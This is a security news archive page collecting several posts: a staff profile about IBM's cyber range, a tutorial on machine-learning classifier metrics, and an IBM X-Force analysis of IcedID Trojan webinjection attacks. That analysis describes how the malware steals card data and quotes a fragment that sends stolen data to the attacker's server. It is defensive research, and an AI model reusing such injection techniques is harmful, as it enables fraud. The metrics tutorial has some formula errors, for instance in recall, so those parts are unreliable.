Category Archives: Threat Intelligence

How Nat Prakongpan Found His Home on the Cyber Range

While most kids were bickering with siblings and fawning over the newest toys, young Nat Prakongpan was building an enterprise network for his school.

Before he became senior manager at the IBM Integration and Threat Intelligence Lab and built a state-of-the-art cyber range from the ground up, Nat spent his childhood in Thailand surrounded by computers. He started programming at age five. At 13, he was certified in network security by one of Thailand’s national labs.

Such was his passion for computing that he stopped going to school in grade six to teach himself at home and later earn a GED — though Nat is quick to point out that his old school let him hang around without attending class, so he was “socialized.”

“When everyone was in class, I was building the computer lab,” Nat laughs. “That’s how I gained experience in building an enterprise network when I was in grade seven.”

That’s right — Nat built his school’s entire network, deploying around 500 machines with everything an enterprise network needed at that time. But this was right as the internet was starting to boom, and, of course, the system was compromised.

“That’s how I quickly pivoted to learning security,” says Nat. “I took more certification classes when I was 15 and was ultimately able to secure that network.”

From Wunderkind to Network Security Expert

So how does a Thai child genius end up in Atlanta tinkering with IBM Security products to get them to talk to each other? If you ask Nat, it was a “total fluke” — in fact, he said much of his adult life is comprised of a series of happy accidents that led him to build IBM’s Cyber Range from the ground up.

The way Nat tells it, he had a few months between finishing his home-schooling and starting university, so he came to the U.S. to stay with his brother-in-law (who was then earning his master’s degree at the University of Florida) and attend an English-language school. His mother encouraged him to apply at the same university and, much to Nat’s surprise, he was accepted, so he stayed for the five years it took to earn his degree in computer engineering.

Like many of his classmates, he struggled to land a good job right out of school. Cue the next happy accident: A friend dragged him along to an information session by Internet Security Systems (ISS) at his alma mater. He had a chat with the team, and they called him at 7 a.m. the next day and asked him to come in for an interview “now.” He got the job and moved to Atlanta.

In an alternate universe, Nat would have led a very different life.

“I would probably have gone to a technical school somewhere in Thailand and worked at some corporation,” he says. “The U.S. and the job I’m in right now is more research and development, but a lot of jobs in Thailand or in Asia are more product users — looking for products to buy versus what we need to build to make things happen. It would be a lot less interesting.”

Home on the Cyber Range

Instead, Nat ended up at IBM Security following IBM’s acquisition of ISS. Still in Atlanta, he now leads the team that ensures all the individual products from IBM Security can work with and talk to each other to provide seamless end-to-end security for customers.

“We write the glue for those products that makes them work together,” he says. “None of them work together out of the box, but my team has the knowledge across all their areas of expertise to make one story from end to end.”

But Nat’s proudest achievement is the IBM Cyber Range in Cambridge, Massachusetts, the first-ever commercial cyber simulator offering a virtual environment in which companies can interact with real-world scenarios to bolster their threat protection and response capabilities. It’s his baby; he architected the technology, got the funding and designed the scenarios. Nat’s team then created a fictional global corporation with around 3,000 virtual workers, built an enterprise network and invented threats. The end result is a fully immersive simulation developed solely to help organizations and individuals learn about crisis situations and improve their incident response skills.

“The training in the Cyber Range is the ultimate success that I have so far: to be able to teach people and pass on the knowledge of best practices,” he says.

Nat may be among the few who built the facility, but he certainly isn’t the only one who recognizes its value. With the Cambridge location now booked more than half a year out, the IBM team set about its next challenge: taking the cyber simulator experience on tour.

IBMer Nat Prakongpan Found His Home on the Cyber Range

Taking the Range on the Road

“One of the things we’ve learned is that our customers invest a lot of time and resources to come though the Cyber Range in Cambridge,” Nat reflects. “It is difficult for a client to bring all its high-level executives into the same location on the same day.

“We were also having a hard time deciding which IBM office would be the host of our next cyber range.”

At this point, the team began exploring more flexible options that would allow the greatest number of people to benefit from the cyber simulation experience. Ultimately, Nat and his colleagues built the first-of-its-kind IBM X-Force Command Cyber Tactical Operations Center (C-TOC).

The C-TOC is not just a state-of-the-art cyber simulation on wheels — Nat proudly explains that it is “a real security operations center (SOC) able to serve live events such as high profile conferences and sporting events.” And to top it all off, the C-TOC is designed to respond to a live attack.

“We can drive up to a client’s site and be able to monitor the attack, as well as perform forensic investigation on systems and networks,” Nat says.

Bringing the C-TOC from a dream to reality involved many of the same technical challenges as creating the Cambridge Cyber Range. The C-TOC, however, is a mobile unit built from the ground up, and Nat’s team therefore had a host of additional considerations to account for, including materials, lighting, electrical, air conditioning, ventilation and more. And to top it all off, they had to maintain compliance with motor vehicle regulations in the U.S. and Europe and ensure that all the technology deployed within the unit would be able to survive the twists and turns of the road.

Nat remembers the first time he heard the C-TOC idea mentioned by IBM Security VP Caleb Barlow.

“Obviously my first thought was that this is a great idea and there are so many possibilities for what we can do with this mobile platform,” he recalls. “My second thought, after I had a little more time, was, ‘Wow, I am going to be responsible for making this all happen!'”

To the surprise of none of his teammates, Nat overcame the obstacles associated with the project, and the C-TOC rolled into action in October 2018. This month, the mobile cyber range will begin a tour of Europe, bringing real-world cyber incident training across the continent.

For Nat, the most rewarding aspect of his involvement with both the Cambridge Cyber Range and the C-TOC has been the responses from IBM customers.

“The excitement we have seen over these projects was phenomenal,” he says. “I think the C-TOC especially also inspires the next generation of youngsters and college students to see what’s possible in cybersecurity and how they can be involved.”

Meet X-Force Command Center Creative Director Allison Ritter

The post How Nat Prakongpan Found His Home on the Cyber Range appeared first on Security Intelligence.

Now That You Have a Machine Learning Model, It’s Time to Evaluate Your Security Classifier

This is the third installment in a three-part series about machine learning. Be sure to read part one and part two for more context on how to choose the right artificial intelligence solution for your security problems.

As we move into this third part, we hope we have helped our readers better identify an artificial intelligence (AI) solution and select the right algorithm to address their organization’s security needs. Now, it’s time to evaluate the effectiveness of the machine learning (ML) model being used. But with so many metrics and systems available to measure security success, where does one begin?

Classification or Regression? Which Can Get Better Insights From Your Data?

By this time, you may have selected an algorithm of choice to use with your machine learning solution. It could fall into one of two categories in general, classification or regression. Here is a reminder of the main difference: From a security standpoint, these two types of algorithms tend to solve different problems. For example, a classifier might be used as an anomaly detector, which is often the basis of the new generation of intrusion detection and prevention systems. Meanwhile, a regression algorithm might be better at things such as detecting denial-of-service attacks (DoS) because these problems tend to involve numbers rather than nominal labels.

At first look, the difference between Classification and Regression might seem complicated, but it really isn’t. It just comes down to what type of value our target variable, also called our dependent variable, contains. In that sense, the main difference between the two is that the output variable in Regression is numerical while he output for Classification is categorical/discrete.

For our purposes in this blog, we’ll focus on metrics that are used to evaluate algorithms applied to supervised ML. For reference, supervised machine learning is the form of learning where we have complete labels and a ground truth. For example, we know that the data can be divided into class1 and class2, and each of our training, validation, and testing samples is labeled as belonging to class1 or class2.

Classification Algorithms – or Classifiers

To have ML work with data, we can select a security classifier, which is an algorithm with a non-numeric class value. We want this algorithm to look at data and classify it into predefined data “classes.” These are usually two or more categorical, dependent variables.

For example, we might try to classify something as an attack or not an attack. We would create two labels, one for each of those classes. A classifier then takes the training set and tries to learn a “decision boundary” between the two classes. There could be more than two classes, and in some cases only one class. For example, the Modified National Institute of Standards and Technology (MNIST) database demo tries to classify an image as one of the ten possible digits from hand-written samples. This demo is often used to show the abilities of deep learning, as the deep net can output probabilities for each digit rather than one single decision. Typically, the digit with the highest probability is chosen as the answer.

A Regression Algorithm – or Regressor

A Regression algorithm, or regressor, is used when the target variable is a number. Think of a function in math: there are numbers that go into the function and there is a number that comes out of it. The task in Regression is to find what this function is. Consider the following example:

Y = 3x+9

We will now find ‘Y’ for various values of ‘X’. Therefore:

X = 1 -> y = 12

X = 2 -> y = 15

X = 3 -> y = 18

The regressor’s job is to figure out what the function is by relying on the values of X and Y. If we give the algorithm enough X and Y values, it will hopefully find the function 3x+9.

We might want to do this in cases where we need to calculate the probability of an event being malicious. Here, we do not want a classification, as the results are not fine-grained enough. Instead, we want a confidence or probability score. So, for example, the algorithm might provide the answer that “there is a 47 percent probability that this sample is malicious.”

In the next section, we will be looking at the various metrics for each, Classification, and Regression, which can help us determine the efficacy of our security posture by using our chosen ML model.

Metrics for Classification

Before we dive into common classification metrics, let’s define some key terms:

  • Ground truth is a set of known labels or descriptions of which class or target variable represents the correct solution. In a binary classification problem, for instance, each example in the ground truth is labeled with the correct classification. This mirrors the training set, where we have known labels for each example.
  • Predicted labels represent the classifications that the algorithm believes are correct. That is, the output of the algorithm.

Now let’s take a closer look at some of the most useful metrics against which we can choose to measure the success of our machine learning deployment.

True Positive Rate

This is the ratio of correctly predicted positive examples to the total number of examples in the ground truth. If there are 100 examples in the ground truth and the model correctly predicts 65 of them as positive, then the true positive rate (TPR) is 65 percent, sometimes written as 0.65.

False Positive Rate

The false positive rate (FPR) is the number of incorrectly predicted examples that are labeled as positive by the algorithm but are actually negative in the ground truth. If we have 100 examples and 15 of them are incorrectly predicted as positive, then the false positive rate would be 15 percent, sometimes written as 0.15.

True Negative Rate

The true negative rate (TNR) is the number of correctly predicted negative examples divided by the number of examples in the ground truth. Let us say that in the scenario of 100 examples that another 15 of these examples were correctly predicted as negative. Therefore, the true negative rate (TNR) is 15 percent, also written as 0.15. Notice here that there were 15 false positives and 15 true negatives. This makes for a total of 30 negative examples.

False Negative Rate

The false negative rate (FNR) is the ratio of examples predicted incorrectly as belonging to the negative class over the number of examples in the ground truth. Continuing with the aforementioned case, let’s say that out of 100 examples in the ground truth, the algorithm correctly predicted 65 as positive. We also know that 15 were predicted as false positives and 15 were predicted as true negatives. This leaves us with 5 examples unaccounted for, so our false negative rate is 5 percent, or 0.05. The false negative rate is the complement to the true positive rate, so the sum of the two metrics should be 70 percent (0.7), as 70 examples actually belong to the positive class.


Accuracy measures the proportion of correct predictions, both positive and negative, to the total number of examples in the ground truth. This metric can often be misleading if, for instance, there is a large proportion of positive examples in the ground truth compared to the number of negative examples. Similarly, if the model predicts only the positive class correctly, accuracy will not give you a sense of how well the model does with negative predictions versus negative examples in the ground truth even though the accuracy could be quite high because the positive examples were predicted.

Accuracy = (TP+TN)/(TP+TN+FP+FN)


Before we explore the precision metric, it’s important to define a few more terms:

  • TP is the raw number of true positives (in the above example, the TP is 65).
  • FP is the raw number of false positives (15 in the above example).
  • TN is the raw number of true negatives (15 in the above example).
  • FN is the raw number of false negatives (5 in the above example).

Precision, sometimes known as the positive predictive value, is the proportion of true positives predicted by the algorithm over the sum of all examples predicted as positive. That is, precision=TP/(TP+FP).

In our example, there were 65 positives in the ground truth that the algorithm correctly labeled as positive. However, it also labeled 15 examples as positive when they were actually negative.

These false positives go into the denominator of the precision calculation. So, we get 65/(65+15), which yields a precision of 0.81.

What does this mean? In brief, high precision means that the algorithm returned far more true positives than false positives. In other words, it is a qualitative measure. The higher the precision, the better job the algorithm did of predicting true positives while rejecting false positives.


Recall, also known as sensitivity, is the ratio of true positives to true positives plus false negatives: TP/(TP+FN).

In our example, there were 65 true positives and 5 false negatives, giving us a recall of 65/(65+5) = 0.93. Recall is a quantitative measure; in a classification task, it is a measure of how well the algorithm “memorized” the training data.

Note that there is often a trade-off between precision and recall. In other words, it’s possible to optimize one metric at the expense of the other. In a security context, we may often want to optimize recall over precision because there are circumstances where we must predict all the possible positives with a high degree of certainty.

For example, in the world of automotive security, where kinetic harm may occur, it is often heard that false positives are annoying, but false negatives can get you killed. That is a dramatic example, but it can apply to other situations as well. In intrusion prevention, for instance, a false positive on a ransomware sample is a minor nuisance, while a false negative could cause catastrophic data loss.

However, there are cases that call for optimizing precision. If you are constructing a virus encyclopedia, for example, higher precision might be preferred when analyzing one sample since the missing information will presumably be acquired from another sample.


An F-measure (or F1 score) is defined as the harmonic mean of precision and recall. There is a generic F-measure, which includes a variable beta that causes the harmonic mean of precision and recall to be weighted.

Typically, the evaluation of an algorithm is done using the F1 score, meaning that beta is 1 and therefore the harmonic mean of precision and recall is unweighted. The term F-measure is used as a synonym for F1 score unless beta is specified.

The F1 score is a value between 0 and 1 where the ideal score is 1, and is calculated as 2 * Precision * Recall/(Precision+Recall), or the harmonic mean. This metric typically lies between precision and recall. If both are 1, then the F-measure equals 1 as well. The F1 score has no intuitive meaning per se; it is simply a way to represent both precision and recall in one metric.

Matthews Correlation Coefficient

The Matthews Correlation Coefficient (MCC), sometimes written as Phi, is a representation of all four values — TP, FP, TN and FN. Unlike precision and recall, the MCC takes true negatives into account, which means it handles imbalanced classes better than other metrics. It is defined as:


If the value is 1, then the classifier and ground truth are in perfect agreement. If the value is 0, then the result of the classifier is no better than random chance. If the result is -1, the classifier and the ground truth are in perfect disagreement. If this coefficient seems low (below 0.5), then you should consider using a different algorithm or fine-tuning your current one.

Youden’s Index

Also known as Youden’s J statistic, Youden’s index is the binary case of the general form of the statistic known as ‘informedness’, which applies to multiclass problems. It is calculated as (sensitivity + specificity–1) and can be seen as the probability of an informed decision verses a random guess. In other words, it takes all four predictors into account.

Remember from our examples that recall=TP/(FP+FN) and specificity, or TNR, is also the complement of the FPR. Therefore, the Youden index incorporates all measures of predictors. If the value of Youden’s index is 0, then the probability of the decision actually being informed is no better than random chance. If it is 1, then both false positives and false negatives are 0.

Area Under the Receiver Operator Characteristic Curve

This metric, usually abbreviated as AUC or ROC, measures the area under the curve plotted with true positives on the Y-axis and false positives on the X-axis. This metric can be useful because it provides a single number that lets you compare models of different types. An AUC value of 0.5 means the result of the test is essentially a coin flip. You want the AUC to be as close to 1 as possible because this enables researchers to make comparisons across experiments.

Area Under the Precision Recall Curve

Area under the precision recall curve (AUPRC) is a measurement that, like MCC, accounts for imbalanced class distributions. If there are far more negative examples than positive examples, you might want to use AUPRC as your metric and visual plot. The curve is precision plotted against recall. The closer to 1, the better. Note that since this metric/plot works best when there are more negative predictions than positive predictions, you might have to invert your labels for testing.

Average Log Loss

Average log loss represents the penalty of wrong prediction. It is the difference between the probability distributions of the actual and predicted models.

In deep learning, this is sometimes known as the cross-entropy loss, which is used when the result of a classifier such as a deep learning model is a probability rather than a binary label. Cross-entropy loss is therefore the divergence of the predicted probability from the actual probability in the ground truth. This is useful in multiclass problems but is also applicable to the simplified case of binary classification.

By using these metrics to evaluate your ML model, and tailoring them to your specific needs, you could fine-tune the output from the data and essentially get more certain results, thus detecting more issues/threats, and optimizing controls as needed.

Metrics for Regression

For regression, the goal is to determine the amount of errors produced by the ML algorithm. The model is considered good if the error value between the predicted and observed value is small.

Let’s take a closer look at some of the metrics used for evaluating regression models.

Mean Absolute Error

Mean absolute error (MAE) is the closeness of the predicted result to the actual result. You can think of this as the average of the differences between the predicted value and the ground truth value. As we proceed along each test example when evaluating against the ground truth, we subtract the actual value reported in the ground truth from the predicted value from the regression algorithm and take the absolute value. We can then calculate the arithmetic mean of these values.

While the interpretation of this metric is well-defined, because it is an arithmetic mean, it could be affected by very large, or very small differences. Note that this value is scale-dependent, meaning that the error is on the same scale as the data. Because of this, you cannot compare two MAE values across datasets.

Root Mean Squared Error

Root mean squared error (RMSE) attempts to represent all error across moments in time in one value. This is often the metric that optimization algorithms seek to minimize in regression problems. When an optimization algorithm is tuning so-called hyperparameters, it seeks to make RMSE as small as possible.

Consider, however, that like MAE, RMSE is both sensitive to large and small outliers and is scale-dependent. Therefore, you have to be careful and examine your residuals to look for outliers — values that are significantly above or below the rest of the residuals. Also, like MAE, it is improper to compare RMSE across datasets unless the scaling translations have been accounted for, because data scaling, whether by normalization or standardization, is dependent upon the data values.

For example, in Standardization, the scale from -1 to 1 is determined by subtracting the mean from each value and dividing the value by the standard deviation. This gives the normal distribution. If, on the other hand, the data is normalized, the scaling is done by taking the current value and subtracting the minimum value, then dividing this by the quantity (maximum value – minimum value). These are completely different scales, and as a result, one cannot compare the RMSE between these two data sets.

Relative Absolute Error

Relative absolute error (RAE) is the mean difference divided by the arithmetic mean of the values in the ground truth. Note that this value can be compared across scales because it has been normalized.

Relative Squared Error

Relative squared error (RSE) is the total squared error of the predicted values divided by the total squared error of the observed values. This also normalizes the error measurement so that it can be compared across datasets.

Machine Learning Can Revolutionize Your Organization’s Security

Machine learning is integral to the enhancement of cybersecurity today and it will only become more critical as the security community embraces cognitive platforms.

In this three-part series, we covered various algorithms and their security context, from cutting-edge technologies such as generative adversarial networks to more traditional algorithms that are still very powerful.

We also explored how to select the appropriate security classifier or regressor for your task, and, finally, how to evaluate the effectiveness of a classifier to help our readers better gauge the impact of optimization. With a better idea about these basics, you’re ready to examine and implement your own algorithms and to move toward revolutionizing your security program with machine learning.

The post Now That You Have a Machine Learning Model, It’s Time to Evaluate Your Security Classifier appeared first on Security Intelligence.

Government, Private Sector Unprepared for 21st Century Cyber Warfare

U.S. government agencies and businesses are largely unprepared for a major cyber attack from state-sponsored actors, and must prepare now, according to a report by key governmental-focused think tanks.

The post Government, Private Sector Unprepared for 21st Century Cyber Warfare appeared first on The Security Ledger.

Related Stories

ExileRAT Malware Targets Tibetan Exile Government

Researchers have discovered a new cyber-espionage campaign targeting the organization representing the exiled Tibetan government.

The post ExileRAT Malware Targets Tibetan Exile Government appeared first on The Security Ledger.

Related Stories

IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites

As part of the ongoing research into cybercrime tools targeting users of financial services and e-commerce, IBM X-Force analyzes the tactics, techniques and procedures (TTPs) of organized malware gangs, exposing their inner workings to help diffuse reliable threat intelligence to the security community.

In recent analysis of IcedID Trojan attacks, our team looked into how IcedID operators target e-commerce vendors in the U.S., the gang’s typical attack turf. The threat tactic is a two-step injection attack designed to steal access credentials and payment card data from victims. Given that the attack is separately operated, it’s plausible that those behind IcedID are either working on different monetization schemes or renting botnet sections to other criminals, turning it to a cybercrime-as-a-service operation, similar to the Gozi Trojan’s business model.

IcedID Origins

IBM Security discovered and named IcedID in September 2017. This modern banking Trojan features similar modules to malware like TrickBot and Gozi. It typically targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites, and its attack turf is mainly the U.S. and Canada. In their configuration files, it is evident that IcedID’s operators target business accounts in search of heftier bounties than those typically found in consumer accounts.

IcedID has the ability to launch different attack types, including webinjection, redirection and proxy redirection of all victim traffic through a port it listens on.

The malware’s distribution and infection tactics suggest that its operators are not new to the cybercrime arena; it has infected users via the Emotet Trojan since 2017 and in test campaigns launched in mid-2018, also via TrickBot. Emotet has been among the most notable malicious services catering to elite cybercrime groups from Eastern Europe over the past two years. Among its dubious customers are groups that operate QakBot, Dridex, IcedID and TrickBot.

Using ATSEngine to Orchestrate Attacks on E-Commerce Users

While current IcedID configurations feature both webinjection and malware-facilitate redirection attacks, let’s focus on its two-stage webinjection scheme. This tactic differs from similar Trojans, most of which deploy the entire injection either from the configuration or on the fly.

To deploy injections and collect stolen data coming from victim input, some IcedID operators use a commercial inject panel known as Yummba’s ATSEngine. ATS stands for automatic transaction system in this case. A web-based control panel, ATSEngine works from an attack/injection server, not from the malware’s command-and-control (C&C) server. It allows the attacker to orchestrate the injection process, update injections on the attack server with agility and speed, parse stolen data, and manage the operation of fraudulent transactions. Commercial transaction panels are very common and have been in widespread use since they became popular in the days of the Zeus Trojan circa 2007.

Targeting Specific E-Commerce Vendors

In the attack we examined, we realized that some IcedID operators are using the malware to target very specific brands in the e-commerce sphere. Our researchers noted that this attack is likely sectioned off from the main botnet and operated by criminals who specialize in fraudulent merchandise purchases and not necessarily bank fraud.

Let’s look at a sample code from those injections. This particular example was taken from an attack designed to steal credentials and take over the accounts of users browsing to a popular e-commerce site in the U.S.

As a first step, to receive any information from the attack server, the resident malware on the infected device must authenticate itself to the botnet’s operator. It does so using a script from the configuration file. If the bot is authenticated to the server, a malicious script is sent from the attacker’s ATSEngine server, in this case via the URL home_link/gate.php.

Notice that IcedID protects its configured instructions with encryption. The bot therefore requires a private key that authenticates versus the attacker’s web-based control panel (e.g., var pkey = “Ab1cd23”). This means the infected device would not interact with other C&C servers that may belong to other criminals or security researchers.

IBM X-Force Research

Figure 1: IcedID Trojan receives instructions on connecting to attack server (source: IBM Trusteer)

Next, we evaluated the eval(function(p, a, c, k, e, r) function in the communication with the attack server and got the following code to reveal. Encoding is a common strategy to pack code and make it more compact.

IBM X-Force Research

Figure 2: IcedID code designed to set the browser to accept external script injections (source: IBM Trusteer)

This function sets the infected user’s browser to accept external script injections that the Trojan will fetch from its operator’s server during an active attack.

The following snippet shows the creation of a document object model (DOM) script element with type Text/javascript and the ID jsess_script_loader. The injection’s developer used this technique to inject a remote script into a legitimate webpage. It fetches the remote script from the attacker’s C&C and then embeds it in a script tag, either in the head of the original webpage or in its body.

Taking a closer look at the function used here, we can see that it loads the script from the home_link of the ssid= of the infected user’s device, along with the current calendar date.

IBM X-Force Research

Figure 3: IcedID code designed to inject remote script into targeted website (source: IBM Trusteer)

Steps 1 and 2: JavaScript and HTML

To perform the webinjection, an external script, a malicious JavaScript snippet, is charged with injecting HTML code into the infected user’s browser. Using this tactic, the malware does not deploy the entire injection from the configuration file, which would essentially expose it to researchers who successfully decrypt the configuration. Rather, it uses an initial injection as a trigger to fetch a second part of the injection from its attack server in real time. That way, the attack can remain more covert and the attacker can have more agility in updating injections without having to update the configuration file on all the infected devices.

In the example below, the HTML code, named ccgrab, modifies the page the victim is viewing and presents social engineering content to steal payment card data. This extra content on the page prompts the victim to provide additional information about his or her identity to log in securely.

IBM X-Force Research

Figure 4: IcedID tricking victim with webinjection (source: IBM Trusteer)

The malware automatically grabs the victim’s access credentials and the webinjection requests the following additional data elements pertaining to the victim’s payment card:

  • Credit card number;
  • CVV2; and
  • The victim’s state of residence.

Once the victim enters these details, the data is sent to the attacker’s ATSEngine server in parsed form that allows the criminal to view and search data via the control panel.

IBM X-Force Research

Figure 5: Parsed stolen data sent to attacker’s injection server (source: IBM Trusteer)

Managing Data Theft and Storage

The malicious script run by the malware performs additional functions to grab content from the victim’s device and his or her activity. The content grabbing function also checks the validity of the user’s input to ensure that the C&C does not accumulate junk data over time and manages the attack’s variables.

IBM X-Force Research

Figure 6: Malicious IcedID script manages data grabbing (source: IBM Trusteer)

Once the data from the user is validated, it is saved to the C&C:

IBM X-Force Research

Figure 7: Saving stolen data to attack server logs (source: IBM Trusteer)

Injection Attack Server Functions

The attack server enables the attacker to command infected bots by a number of functions. Let’s look at the function list that we examined once we decoded IcedID’s malicious script:

Function name



Checks for frames on the website to look for potential third-party security controls.


Validates that payment card numbers are correct. This function is likely based on the Luhn algorithm.


The main function that sets off the data grabbing process.


Adds new logs to the reports section in the attack server.


Writes logs to the attack server after validation of the private key and the victim’s service set identifier (SSID). This is achieved by the following script: getData(gate_link + a + “&pkey=” + urlEncode(pkey) + “&ssid=” + b, b)

The attack server enables the operator to use different functions that are sectioned into tabs on the control panel:

  • Accounts page functions — shows the account pages the victim is visiting with the infected user’s credentials.
  • Content variables — includes report generation, account page controls, pushing HTML content into pages the victim is viewing, and a comments module to keep track of activity.
  • Private functions to get HEX and decode.
  • Main page functions.
  • Comments global.
  • Reports global.

Figure 8 below shows the layout of information about functions used on a given infected device as it appears to the attacker using the ATSEngine control panel:

IBM X-Force Research

Figure 8: Attacker’s view from the control panel that manages stolen data (source: IBM Trusteer)

Data Management and Views

The ATSEngine control panel enables the attacker to view the active functions with a time stamp (see Figure 8). The following information is retrieved from the victim’s device and sent to the attack server:

  • Last report time from this infected device;
  • Victim’s IP Address;
  • Victim’s attributed BotID;
  • Victim’s login credentials to the website he or she is visiting;
  • Additional grabbed data from webinjection to the target page, including the victim’s name, payment card type, card number and CVV2, and state of residence; and
  • Comments section inserted by the attacker about the particular victim and his or her accounts.

A view from the control panel displays essential data in tables, providing the attacker with the victim’s login credentials to the targeted site:

IBM X-Force Research

Figure 9: Stolen account information parsed on control panel view (source: IBM Trusteer)

Sectioned IcedID Botnet

Following the analysis of IcedID’s injections and control panel features, our researchers believe that, much like other Trojan-operating gangs, IcedID is possibly renting out its infrastructure to other criminals who specialize in various fraud scenarios.

The control panel, a common element in online fraud operations, reveals the use of a transaction automation tool (ATS) by IcedID’s operators. This commercial panel helps facilitate bot control, data management and management of fraudulent activity. The panel of choice here is a longtime staple in the cybercrime arena called the Yummba/ATSEngine.

Fraud scenarios may vary from one operator to another, but IcedID’s TTPs remain the same and are applied to all the attacks the Trojan facilitates. As such, IcedID’s webinjections can apply to any website, and its redirection schemes can be fitted to any target.

Sharpened Focus in 2019

While some Trojan gangs choose to expand their attack turf into more countries, this requires funding, resources to build adapted attack tools, alliances with local organized crime and additional money laundering operations. In IcedID’s case, it does not appear the gang is looking to expand. Ever since it first appeared in the wild, IcedID has kept its focus on North America by targeting banks and e-commerce businesses in that region.

In 2018, IcedID reached the fourth rank on the global financial Trojan chart, having kept up its malicious activity throughout the year.

IBM X-Force Research

Figure 10: Top 10 financial Trojan gangs in 2018 (source: IBM Trusteer)

In 2019, our team expects to see this trend continue. To keep up on threats like IcedID, read more threat research from the X-Force team and join X-Force Exchange, where we publish indicators of compromise (IoCs) and other valuable intelligence for security professionals.

The post IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites appeared first on Security Intelligence.

It’s Time to Modernize Traditional Threat Intelligence Models for Cyber Warfare

When a client asked me to help build a cyberthreat intelligence program recently, I jumped at the opportunity to try something new and challenging. To begin, I set about looking for some rudimentary templates with a good outline for building a threat intelligence process, a few solid platforms that are user-friendly, the basic models for cyber intelligence collection and a good website for describing various threats an enterprise might face. This is what I found:

  1. There are a handful of rudimentary templates for building a good cyberthreat intelligence program available for free online. All of these templates leave out key pieces of information that any novice to the cyberthreat intelligence field would be required to know. Most likely, this is done to entice organizations into spending copious amounts of money on a specialist.
  2. The number of companies that specialize in the collection of cyberthreat intelligence is growing at a ludicrous rate, and they all offer something that is different, unique to certain industries, proprietary, automated via artificial intelligence (AI) and machine learning, based on pattern recognition, or equipped with behavioral analytics.
  3. The basis for all threat intelligence is heavily rooted in one of three basic models: Lockheed Martin’s Cyber Kill Chain, MITRE’s ATT&CK knowledge base and The Diamond Model of Intrusion Analysis.
  4. A small number of vendors working on cyberthreat intelligence programs or processes published a complete list of cyberthreats, primary indicators, primary actors, primary targets, typical attack vectors and potential mitigation techniques. Of that small number, very few were honest when there was no useful mitigation or defensive strategy against a particular tactic.
  5. All of the cyberthreat intelligence models in use today have gaps that organizations will need to overcome.
  6. A search within an article content engine for helpful articles with the keyword “threat intelligence” produced more than 3,000 results, and a Google search produces almost a quarter of a million. This is completely ridiculous. Considering how many organizations struggle to find experienced cyberthreat intelligence specialists to join their teams — and that cyberthreats grow by the day while mitigation strategies do not — it is not possible that there are tens of thousands of professionals or experts in this field.

It’s no wonder why organizations of all sizes in a variety of industries are struggling to build a useful cyberthreat intelligence process. For companies that are just beginning their cyberthreat intelligence journey, it can be especially difficult to sort through all these moving parts. So where do they begin, and what can the cybersecurity industry do to adapt traditional threat intelligence models to the cyber battlefield?

How to Think About Thinking

A robust threat intelligence process serves as the basis for any cyberthreat intelligence program. Here is some practical advice to help organizations plan, build and execute their program:

  1. Stop and think about the type(s) of cyberthreat intelligence data the organization needs to collect. For example, if a company manufactures athletic apparel for men and women, it is unnecessary to collect signals, geospatial data or human intelligence.
  2. How much budget is available to collect the necessary cyberthreat intelligence? For example, does the organization have the budget to hire threat hunters and build a cyberthreat intelligence program uniquely its own? What about purchasing threat intelligence as a service? Perhaps the organization should hire threat hunters and purchase a threat intelligence platform for them to use? Each of these options has a very different cost model for short- and long-term costs.
  3. Determine where cyberthreat intelligence data should be stored once it is obtained. Does the organization plan to build a database or data lake? Does it intend to store collected threat intelligence data in the cloud? If that is indeed the intention, pause here and reread step one. Cloud providers have very different ideas about who owns data, and who is ultimately responsible for securing that data. In addition, cloud providers have a wide range of security controls — from the very robust to a complete lack thereof.
  4. How does the organization plan to use collected cyberthreat intelligence data? It can be used for strategic purposes, tactical purposes or both within an organization.
  5. Does the organization intend to share any threat intelligence data with others? If yes, then you can take the old cybersecurity industry adage “trust but verify” and throw it out. The new industry adage should be “verify and then trust.” Never assume that an ally will always be an ally.
  6. Does the organization have enough staff to spread the workload evenly, and does the organization plan to include other teams in the threat intelligence process? Organizations may find it very helpful to include other teams, either as strategic partners, such as vulnerability management, application security, infrastructure and networking, and risk management teams, or as tactical partners, such as red, blue and purple teams.

How Can We Adapt Threat Intelligence Models to the Cyber Battlefield?

As mentioned above, the threat intelligence models in use today were not designed for cyber warfare. They are typically linear models, loosely based on Carl Von Clausewitz’s military strategy and tailored for warfare on a physical battlefield. It’s time for the cyberthreat intelligence community to define a new model, perhaps one that is three-dimensional, nonlinear, rooted in elementary number theory and that applies vector calculus.

Much like game theory, The Diamond Model of Intrusion Analysis is sufficient if there are two players (the victim and the adversary), but it tends to fall apart if the adversary is motivated by anything other than sociopolitical or socioeconomic payoff, if there are three or more players (e.g., where collusion, cooperation and defection of classic game theory come into play), or if the adversary is artificially intelligent. In addition, The Diamond Model of Intrusion Analysis attempts to show a stochastic model diagram but none of the complex equations behind the model — probably because that was someone’s 300-page Ph.D. thesis in applied mathematics. This is not much help to the average reader or a newcomer to the threat intelligence field.

Nearly all models published thus far are focused on either external actors or insider threats, as though a threat actor must be one or the other. None of the widely accepted models account for, or include, physical security.

While there are many good articles about reducing alert fatigue in the security operations center (SOC), orchestrating security defenses, optimizing the SOC with behavioral analysis and so on, these articles assume that the reader knows what any of these things mean and what to do about any of it. A veteran in the cyberthreat intelligence field would have doubts that behavioral analysis and pattern recognition are magic bullets for automated threat hunting, for example, since there will always be threat actors that don’t fit the pattern and whose behavior is unpredictable. Those are two of the many reasons why the fields of forensic psychology and criminal profiling were created.

Furthermore, when it comes to the collection of threat intelligence, very few articles provide insight on what exactly constitutes “useful data,” how long to store it and which types of data analysis would provide the best insight.

It would be a good idea to get the major players in the cyberthreat intelligence sector together to develop at least one new model — but preferably more than one. It’s time for industry leaders to develop new ways of classifying threats and threat actors, share what has and has not worked for them, and build more boundary connections than the typical socioeconomic or sociopolitical ones. The sector could also benefit from looking ahead at what might happen if threat actors choose to augment their crimes with algorithms and AI.

The post It’s Time to Modernize Traditional Threat Intelligence Models for Cyber Warfare appeared first on Security Intelligence.

A Hackers Take On Blockchain Security

One of the leading factors of the blockchain—aside from the obvious decentralization—is the high level of security behind it. It’s not uncommon to hear people claim that it is “unhackable.”

The post A Hackers Take On Blockchain Security appeared first on The Cyber Security Place.

Buyer Beware: Not All Threat Intel Add-Ons are Equal

